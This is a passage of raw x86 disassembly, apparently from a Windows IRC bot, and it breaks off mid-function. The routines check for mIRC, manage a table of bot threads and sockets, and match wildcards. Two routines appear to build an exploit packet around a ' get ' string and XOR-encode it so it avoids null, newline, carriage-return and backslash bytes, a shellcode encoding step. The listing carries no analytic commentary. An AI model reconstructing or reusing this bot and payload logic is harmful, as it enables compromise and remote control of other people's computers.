loc_40AADD: ; CODE XREF: .text:0040AAB5�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AAE6(char *Source)
sub_40AAE6 proc near ; CODE XREF: sub_40AB83+5D�p
Dest = byte ptr -1Ch
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_42B038 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_444160 ; FindWindowA
cmp esi, 64h
jbe short loc_40AB35
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AB1E
mov eax, offset byte_42B633
loc_40AB1E: ; CODE XREF: sub_40AAE6+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+Dest]
push 1Ch ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_40AB4F
; ---------------------------------------------------------------------------
loc_40AB35: ; CODE XREF: sub_40AAE6+28�j
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AB43
mov eax, offset byte_42B633
loc_40AB43: ; CODE XREF: sub_40AAE6+56�j
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40AB4F: ; CODE XREF: sub_40AAE6+4D�j
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp eax, 2
pop ecx
pop esi
jbe short loc_40AB7E
push 1Ch ; Count
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 1Ch ; Count
lea eax, [ebp+Dest]
push eax ; Source
push [ebp+Source] ; Dest
call _strncpy
add esp, 18h
loc_40AB7E: ; CODE XREF: sub_40AAE6+77�j
mov eax, [ebp+Source]
leave
retn
sub_40AAE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AB83(char *Dest,int,int,char *Str1)
sub_40AB83 proc near ; CODE XREF: sub_402472+52�p
; sub_4025EF+4B�p ...
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str1 = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
xor esi, esi
loc_40AB8C: ; CODE XREF: sub_40AB83+40�j
cmp [ebp+Str1], 0
jz short loc_40ABAA
lea eax, dword_43C4A0[esi]
push eax ; Str2
push [ebp+Str1] ; Str1
call _strcmp
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40ABB8
; ---------------------------------------------------------------------------
loc_40ABAA: ; CODE XREF: sub_40AB83+D�j
mov ecx, dword_43C4AC[esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40ABB8: ; CODE XREF: sub_40AB83+25�j
test eax, eax
jnz short loc_40ABC7
add esi, 14h
inc edi
cmp esi, 78h
jb short loc_40AB8C
jmp short loc_40ABD5
; ---------------------------------------------------------------------------
loc_40ABC7: ; CODE XREF: sub_40AB83+37�j
push [ebp+Source] ; Dest
lea eax, [edi+edi*4]
call off_43C4B0[eax*4]
pop ecx
loc_40ABD5: ; CODE XREF: sub_40AB83+42�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40ABE8
push [ebp+Source] ; Source
call sub_40AAE6
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40ABE8: ; CODE XREF: sub_40AB83+58�j
mov eax, [ebp+Source]
pop ebp
retn
sub_40AB83 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40ABED(char *Str,int)
sub_40ABED proc near ; CODE XREF: sub_40AC0D+A�p
; sub_40AE01+8�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+Str] ; Str
call _strlen
push [esp+8+arg_4] ; Str
mov esi, eax
call _strlen
pop ecx
pop ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_40ABED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AC0D(void *Dst,int,char *Src,int)
sub_40AC0D proc near ; CODE XREF: sub_40AE18+49�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C] ; int
push [ebp+Src] ; Str
call sub_40ABED
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40AC2A
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40AC2A: ; CODE XREF: sub_40AC0D+17�j
push ebx
push esi
push edi
push [ebp+Src] ; Str
call _strlen
push [ebp+arg_C] ; Str
mov esi, eax
call _strlen
mov ebx, [ebp+Dst]
mov edi, eax
lea eax, [edi+esi+12h]
mov dword_43D7EC, eax
lea eax, [edi+1]
mov dword_43D80D, eax
push 0FFFFFFEDh
lea eax, [edi+17h]
mov dword_43D805, eax
pop eax
push 74h ; Size
sub eax, edi
push offset dword_43D788 ; Src
push ebx ; Dst
mov dword_43D81B, eax
call _memcpy
push esi ; Size
push [ebp+Src] ; Src
lea eax, [ebx+74h]
push eax ; Dst
call _memcpy
push 5 ; Size
add esi, 74h
lea eax, [esi+ebx]
push offset aGet ; " get "
push eax ; Dst
call _memcpy
push edi ; Size
push [ebp+arg_C] ; Src
add esi, 5
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
push 10h ; Size
add esi, edi
lea eax, [esi+ebx]
push (offset aGet+5) ; Src
push eax ; Dst
call _memcpy
add esp, 44h
push edi ; Size
push [ebp+arg_C] ; Src
add esi, 10h
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
push 38h ; Size
add esi, edi
push offset byte_43D811 ; Src
add esi, ebx
push esi ; Dst
call _memcpy
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40AC0D endp
; =============== S U B R O U T I N E =======================================
sub_40ACE5 proc near ; CODE XREF: sub_40AD00+47�p
; sub_40AE01+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40ACEE
inc ecx
loc_40ACEE: ; CODE XREF: sub_40ACE5+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40ACE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AD00(void *Dst,int,int,int)
sub_40AD00 proc near ; CODE XREF: sub_40AE18+56�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_C]
cmp dl, 0Ah
jz short loc_40AD1A
cmp dl, 0Dh
jz short loc_40AD1A
cmp dl, 5Ch
jz short loc_40AD1A
test dl, dl
jnz short loc_40AD1E
loc_40AD1A: ; CODE XREF: sub_40AD00+A�j
; sub_40AD00+F�j ...
inc edx
mov [ebp+arg_C], edx
loc_40AD1E: ; CODE XREF: sub_40AD00+18�j
push esi
mov esi, 0FFh
cmp edx, esi
jbe short loc_40AD46
mov eax, edx
shr eax, 8
cmp al, 0Ah
jz short loc_40AD3D
cmp al, 0Dh
jz short loc_40AD3D
cmp al, 5Ch
jz short loc_40AD3D
test al, al
jnz short loc_40AD46
loc_40AD3D: ; CODE XREF: sub_40AD00+2F�j
; sub_40AD00+33�j ...
add edx, 100h
mov [ebp+arg_C], edx
loc_40AD46: ; CODE XREF: sub_40AD00+26�j
; sub_40AD00+3B�j
push edx
call sub_40ACE5
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40AD5C
cmp eax, 0FFFFh
jbe short loc_40AD63
loc_40AD5C: ; CODE XREF: sub_40AD00+53�j
xor eax, eax
jmp loc_40ADFE
; ---------------------------------------------------------------------------
loc_40AD63: ; CODE XREF: sub_40AD00+5A�j
push ebx
mov bl, byte_4D1FE8
xor ecx, ecx
test edx, edx
push edi
mov edi, [ebp+arg_8]
jbe short loc_40AD90
loc_40AD74: ; CODE XREF: sub_40AD00+8E�j
mov al, [ecx+edi]
xor al, bl
jz short loc_40AD87
cmp al, 0Ah
jz short loc_40AD87
cmp al, 0Dh
jz short loc_40AD87
cmp al, 5Ch
jnz short loc_40AD8B
loc_40AD87: ; CODE XREF: sub_40AD00+79�j
; sub_40AD00+7D�j ...
inc bl
xor ecx, ecx
loc_40AD8B: ; CODE XREF: sub_40AD00+85�j
inc ecx
cmp ecx, edx
jb short loc_40AD74
loc_40AD90: ; CODE XREF: sub_40AD00+72�j
cmp edx, esi
mov byte_4D1FE8, bl
ja short loc_40ADBC
push 15h ; Size
push offset dword_43D770 ; Src
push [ebp+Dst] ; Dst
mov byte_43D77D, dl
mov byte_43D781, bl
call _memcpy
add esp, 0Ch
push 15h
jmp short loc_40ADDD
; ---------------------------------------------------------------------------
loc_40ADBC: ; CODE XREF: sub_40AD00+98�j
push 17h ; Size
push offset dword_43D758 ; Src
push [ebp+Dst] ; Dst
mov word_43D766, dx
mov byte_43D76B, bl
call _memcpy
add esp, 0Ch
push 17h
loc_40ADDD: ; CODE XREF: sub_40AD00+BA�j
xor eax, eax
cmp [ebp+arg_C], eax
pop ecx
jbe short loc_40ADF9
mov edx, [ebp+Dst]
lea esi, [ecx+edx]
loc_40ADEB: ; CODE XREF: sub_40AD00+F7�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40ADEB
loc_40ADF9: ; CODE XREF: sub_40AD00+E3�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40ADFE: ; CODE XREF: sub_40AD00+5E�j
pop esi
leave
retn
sub_40AD00 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AE01(char *Str,int)
sub_40AE01 proc near ; CODE XREF: sub_40AE18+D�p
Str = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4] ; int
push [esp+4+Str] ; Str
call sub_40ABED
push eax
call sub_40ACE5
add esp, 0Ch
retn
sub_40AE01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AE18(void *Dst,int,char *Str,int)
sub_40AE18 proc near ; CODE XREF: sub_410A35+7C�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+Src]
push edi
mov edi, [ebp+arg_C]
push edi ; int
push ebx ; Str
call sub_40AE01
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_40AE38
cmp eax, 0FFFFh
jbe short loc_40AE3C
loc_40AE38: ; CODE XREF: sub_40AE18+17�j
xor eax, eax
jmp short loc_40AE81
; ---------------------------------------------------------------------------
loc_40AE3C: ; CODE XREF: sub_40AE18+1E�j
push esi
push edi ; int
push ebx ; Str
call sub_40ABED
add eax, 101h
push eax ; Size
call _malloc
add esp, 0Ch
push edi ; int
push ebx ; Src
push edi ; int
push ebx ; Str
mov esi, eax
call sub_40ABED
pop ecx
pop ecx
push eax ; int
push esi ; Dst
call sub_40AC0D
push eax ; int
push esi ; int
push [ebp+arg_4] ; int
push [ebp+Dst] ; Dst
call sub_40AD00
push esi ; Memory
mov edi, eax
call _free
add esp, 24h
mov eax, edi
pop esi
loc_40AE81: ; CODE XREF: sub_40AE18+22�j
pop edi
pop ebx
pop ebp
retn
sub_40AE18 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AE85(char *Source,int,int)
sub_40AE85 proc near ; CODE XREF: sub_40274D+6E4�p
; sub_40274D+91A�p ...
Source = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_4442E8
loc_40AE8D: ; CODE XREF: sub_40AE85+18�j
cmp byte ptr [eax], 0
jz short loc_40AEA1
add eax, 234h
inc edi
cmp eax, offset dword_4D12E8
jl short loc_40AE8D
jmp short loc_40AEEC
; ---------------------------------------------------------------------------
loc_40AEA1: ; CODE XREF: sub_40AE85+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh ; Count
push [esp+0Ch+Source] ; Source
lea eax, dword_4442E8[esi]
push eax ; Dest
call _strncpy
mov eax, [esp+14h+arg_4]
and dword_4444EC[esi], 0
mov dword_4444E8[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and dword_4444F0[esi], 0
mov dword_4444F4[esi], eax
mov byte_444500[esi], 0
pop esi
loc_40AEEC: ; CODE XREF: sub_40AE85+1A�j
mov eax, edi
pop edi
retn
sub_40AE85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AEF0(int,char *Str,int,int)
sub_40AEF0 proc near ; CODE XREF: sub_40B186+31�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_4329BC ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
xor edi, edi
mov esi, offset dword_4442E8
loc_40AF1A: ; CODE XREF: sub_40AEF0+78�j
cmp byte ptr [esi], 0
jz short loc_40AF5B
cmp [ebp+arg_C], 0
jnz short loc_40AF2E
cmp dword ptr [esi+204h], 0
jnz short loc_40AF5B
loc_40AF2E: ; CODE XREF: sub_40AEF0+33�j
push esi
push edi
lea eax, [ebp+Dest]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 24h
loc_40AF5B: ; CODE XREF: sub_40AEF0+2D�j
; sub_40AEF0+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4D12E8
jl short loc_40AF1A
pop edi
pop esi
leave
retn
sub_40AEF0 endp
; =============== S U B R O U T I N E =======================================
sub_40AF6E proc near ; CODE XREF: sub_40274D+779B�p
; sub_40AFF6+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40AFF0
cmp esi, 400h
jge short loc_40AFF0
imul esi, 234h
push edi
push ebx
lea edi, dword_4444FC[esi]
push dword ptr [edi]
call ds:dword_42B028 ; TerminateThread
cmp [edi], ebx
jz short loc_40AFA0
inc ebp
loc_40AFA0: ; CODE XREF: sub_40AF6E+2F�j
mov [edi], ebx
lea edi, dword_4444F0[esi]
mov eax, [edi]
cmp eax, ebx
mov dword_4444E8[esi], ebx
mov dword_4444EC[esi], ebx
jbe short loc_40AFC1
push eax
call sub_41C736
pop ecx
loc_40AFC1: ; CODE XREF: sub_40AF6E+4A�j
mov [edi], ebx
lea edi, dword_4444F4[esi]
push dword ptr [edi]
mov byte ptr dword_4442E8[esi], bl
mov byte_444500[esi], bl
call dword_444218 ; closesocket
lea esi, dword_4444F8[esi]
push dword ptr [esi]
mov [edi], ebx
call dword_444218 ; closesocket
mov [esi], ebx
pop edi
loc_40AFF0: ; CODE XREF: sub_40AF6E+D�j
; sub_40AF6E+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_40AF6E endp
; =============== S U B R O U T I N E =======================================
sub_40AFF6 proc near ; CODE XREF: sub_40110F+18�p
; sub_40274D+2D10�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_4442E8
loc_40B002: ; CODE XREF: sub_40AFF6+2A�j
cmp byte ptr [esi], 0
jz short loc_40B013
push edi
call sub_40AF6E
test eax, eax
pop ecx
jz short loc_40B013
inc ebx
loc_40B013: ; CODE XREF: sub_40AFF6+F�j
; sub_40AFF6+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4D12E8
jl short loc_40B002
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40AFF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B028 proc near ; CODE XREF: sub_40274D+3E9B�p
; sub_40274D+3FE3�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_4444EC
loc_40B03C: ; CODE XREF: sub_40B028+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B05E
test edi, edi
jle short loc_40B050
cmp [esi], edi
jz short loc_40B050
cmp ebx, edi
jnz short loc_40B05E
loc_40B050: ; CODE XREF: sub_40B028+1E�j
; sub_40B028+22�j
push ebx
call sub_40AF6E
test eax, eax
pop ecx
jz short loc_40B05E
inc [ebp+var_4]
loc_40B05E: ; CODE XREF: sub_40B028+1A�j
; sub_40B028+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4D14EC
jl short loc_40B03C
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B028 endp
; =============== S U B R O U T I N E =======================================
sub_40B075 proc near ; CODE XREF: sub_40274D+896�p
; sub_40274D+1B5F�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_4444E8
loc_40B07C: ; CODE XREF: sub_40B075+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B085
inc eax
loc_40B085: ; CODE XREF: sub_40B075+D�j
add ecx, 234h
cmp ecx, offset dword_4D14E8
jl short loc_40B07C
retn
sub_40B075 endp
; =============== S U B R O U T I N E =======================================
sub_40B094 proc near ; CODE XREF: sub_40274D+2210�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_4444E8
push esi
loc_40B09E: ; CODE XREF: sub_40B094+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40B0B7
add ecx, 234h
inc edx
cmp ecx, offset dword_4D14E8
jl short loc_40B09E
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B0B7: ; CODE XREF: sub_40B094+10�j
mov eax, edx
pop esi
retn
sub_40B094 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B0BB(int,int,int,int,int,int,int,char *Str)
sub_40B0BB proc near ; CODE XREF: sub_40274D+10CE�p
; sub_40274D+10E9�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
Str = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+Str], eax
jz short loc_40B0D4
push [ebp+Str] ; Str
call j__atol
pop ecx
loc_40B0D4: ; CODE XREF: sub_40B0BB+E�j
push eax
push [ebp+arg_18]
call sub_40B028
test eax, eax
pop ecx
pop ecx
jle short loc_40B100
push eax
push [ebp+arg_14]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_40B11A
; ---------------------------------------------------------------------------
loc_40B100: ; CODE XREF: sub_40B0BB+26�j
push [ebp+arg_14]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax ; Dest
call _sprintf
add esp, 10h
loc_40B11A: ; CODE XREF: sub_40B0BB+43�j
cmp [ebp+arg_C], 0
jnz short loc_40B13A
push 0 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_40B13A: ; CODE XREF: sub_40B0BB+63�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
leave
retn
sub_40B0BB endp
; =============== S U B R O U T I N E =======================================
sub_40B149 proc near ; CODE XREF: sub_4025EF+14C�p
; sub_40B186+39�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov dword_4444FC[eax], ecx
mov dword_4444E8[eax], ecx
mov dword_4444EC[eax], ecx
mov dword_4444F0[eax], ecx
mov dword_4444F4[eax], ecx
mov dword_4444F8[eax], ecx
mov byte ptr dword_4442E8[eax], cl
mov byte_444500[eax], cl
retn
sub_40B149 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40B186 proc near ; DATA XREF: sub_40274D+275F�o
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10] ; int
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_98] ; int
call sub_40AEF0
push [ebp+74h+var_14]
call sub_40B149
add esp, 14h
push 0
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_40B186 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B1D0 proc near ; CODE XREF: sub_40B264+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40B1F1
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40B1F1: ; CODE XREF: sub_40B1D0+19�j
push ebx
push esi
loc_40B1F3: ; CODE XREF: sub_40B1D0+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40B201
cmp [ebp+var_4], eax
jnz short loc_40B249
loc_40B201: ; CODE XREF: sub_40B1D0+2A�j
test edi, edi
jnz short loc_40B23E
cmp bl, 2Dh
jnz short loc_40B232
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_40B232
cmp al, 5Dh
jz short loc_40B232
cmp [ebp+var_4], edi
jnz short loc_40B232
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40B23E
cmp bl, al
jg short loc_40B23E
mov [edx], esi
jmp short loc_40B23B
; ---------------------------------------------------------------------------
loc_40B232: ; CODE XREF: sub_40B1D0+38�j
; sub_40B1D0+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40B23E
loc_40B23B: ; CODE XREF: sub_40B1D0+60�j
xor edi, edi
inc edi
loc_40B23E: ; CODE XREF: sub_40B1D0+33�j
; sub_40B1D0+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_40B1F3
; ---------------------------------------------------------------------------
loc_40B249: ; CODE XREF: sub_40B1D0+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40B256
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40B256: ; CODE XREF: sub_40B1D0+7E�j
cmp edi, eax
jnz short loc_40B25F
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40B25F: ; CODE XREF: sub_40B1D0+88�j
mov eax, edi
pop edi
leave
retn
sub_40B1D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B264 proc near ; CODE XREF: sub_40274D+7A0F�p
; sub_40B2F8+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_40B2C6
; ---------------------------------------------------------------------------
loc_40B270: ; CODE XREF: sub_40B264+66�j
cmp eax, 1
jnz short loc_40B2D7
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40B2D7
cmp cl, 2Ah
jz short loc_40B2AF
cmp cl, 3Fh
jz short loc_40B294
cmp cl, 5Bh
jz short loc_40B299
xor eax, eax
cmp cl, dl
setz al
loc_40B294: ; CODE XREF: sub_40B264+22�j
inc [ebp+arg_4]
jmp short loc_40B2C2
; ---------------------------------------------------------------------------
loc_40B299: ; CODE XREF: sub_40B264+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_40B1D0
mov esi, [ebp+arg_0]
jmp short loc_40B2C0
; ---------------------------------------------------------------------------
loc_40B2AF: ; CODE XREF: sub_40B264+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40B2F8
mov esi, [ebp+arg_0]
dec esi
loc_40B2C0: ; CODE XREF: sub_40B264+49�j
pop ecx
pop ecx
loc_40B2C2: ; CODE XREF: sub_40B264+33�j
inc esi
mov [ebp+arg_0], esi
loc_40B2C6: ; CODE XREF: sub_40B264+A�j
mov cl, [esi]
test cl, cl
jnz short loc_40B270
jmp short loc_40B2D7
; ---------------------------------------------------------------------------
loc_40B2CE: ; CODE XREF: sub_40B264+76�j
cmp eax, 1
jnz short loc_40B2F3
inc esi
mov [ebp+arg_0], esi
loc_40B2D7: ; CODE XREF: sub_40B264+F�j
; sub_40B264+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_40B2CE
cmp eax, 1
jnz short loc_40B2F3
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40B2F3
cmp byte ptr [esi], 0
jnz short loc_40B2F3
xor eax, eax
inc eax
jmp short loc_40B2F5
; ---------------------------------------------------------------------------
loc_40B2F3: ; CODE XREF: sub_40B264+6D�j
; sub_40B264+7B�j ...
xor eax, eax
loc_40B2F5: ; CODE XREF: sub_40B264+8D�j
pop esi
pop ebp
retn
sub_40B264 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2F8 proc near ; CODE XREF: sub_40B264+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_40B327
; ---------------------------------------------------------------------------
loc_40B312: ; CODE XREF: sub_40B2F8+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_40B323
cmp cl, 2Ah
jnz short loc_40B32F
cmp cl, 3Fh
jnz short loc_40B325
loc_40B323: ; CODE XREF: sub_40B2F8+1F�j
inc dword ptr [edi]
loc_40B325: ; CODE XREF: sub_40B2F8+29�j
inc dword ptr [esi]
loc_40B327: ; CODE XREF: sub_40B2F8+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_40B312
loc_40B32F: ; CODE XREF: sub_40B2F8+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_40B33E
loc_40B334: ; CODE XREF: sub_40B2F8+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_40B334
loc_40B33E: ; CODE XREF: sub_40B2F8+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_40B35B
cmp [eax], bl
jz short loc_40B34E
xor eax, eax
jmp short loc_40B3C0
; ---------------------------------------------------------------------------
loc_40B34E: ; CODE XREF: sub_40B2F8+50�j
cmp dl, bl
jnz short loc_40B35B
cmp [eax], bl
jnz short loc_40B35B
xor eax, eax
inc eax
jmp short loc_40B3C0
; ---------------------------------------------------------------------------
loc_40B35B: ; CODE XREF: sub_40B2F8+4C�j
; sub_40B2F8+58�j ...
push ecx
push eax
call sub_40B264
test eax, eax
pop ecx
pop ecx
jnz short loc_40B3AA
loc_40B368: ; CODE XREF: sub_40B2F8+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_40B38C
loc_40B374: ; CODE XREF: sub_40B2F8+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_40B38C
cmp [eax], bl
jz short loc_40B3A1
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_40B374
loc_40B38C: ; CODE XREF: sub_40B2F8+7A�j
; sub_40B2F8+81�j
cmp [eax], bl
jz short loc_40B3A1
push eax
push dword ptr [esi]
call sub_40B264
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B3A6
; ---------------------------------------------------------------------------
loc_40B3A1: ; CODE XREF: sub_40B2F8+85�j
; sub_40B2F8+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40B3A6: ; CODE XREF: sub_40B2F8+A7�j
cmp eax, ebx
jnz short loc_40B368
loc_40B3AA: ; CODE XREF: sub_40B2F8+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40B3BD
mov eax, [esi]
cmp [eax], bl
jnz short loc_40B3BD
mov [ebp+var_4], 1
loc_40B3BD: ; CODE XREF: sub_40B2F8+B6�j
; sub_40B2F8+BC�j
mov eax, [ebp+var_4]
